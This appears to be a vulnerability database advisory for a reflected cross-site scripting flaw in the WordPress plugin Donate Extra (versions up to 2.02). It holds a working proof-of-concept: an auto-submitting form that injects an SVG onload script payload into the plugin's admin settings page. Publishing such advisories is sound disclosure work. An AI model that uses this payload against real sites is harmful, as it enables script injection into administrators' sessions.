Lucene search

K
wpexploitP7e4WPEX-ID:6D596AFB-CAC3-4EF2-9742-235C068D1006
HistoryApr 26, 2022 - 12:00 a.m.

Donate Extra <= 2.02 - Reflected Cross-Site Scripting

2022-04-2600:00:00
p7e4
54

0.001 Low

EPSS

Percentile

40.3%

The plugin does not sanitise and escape a parameter before outputting it back in the response, leading to a Reflected cross-Site Scripting

<form action="http://localhost/wp-admin/admin.php?page=donateextraSettings" method="post" name="form1">
   <input type="text" name="notice" value='<svg/onload=alert(/xss/)>'>
   <button type="submit"></button>
</form>
<script>
   document.form1.submit();
</script>

0.001 Low

EPSS

Percentile

40.3%

Related for WPEX-ID:6D596AFB-CAC3-4EF2-9742-235C068D1006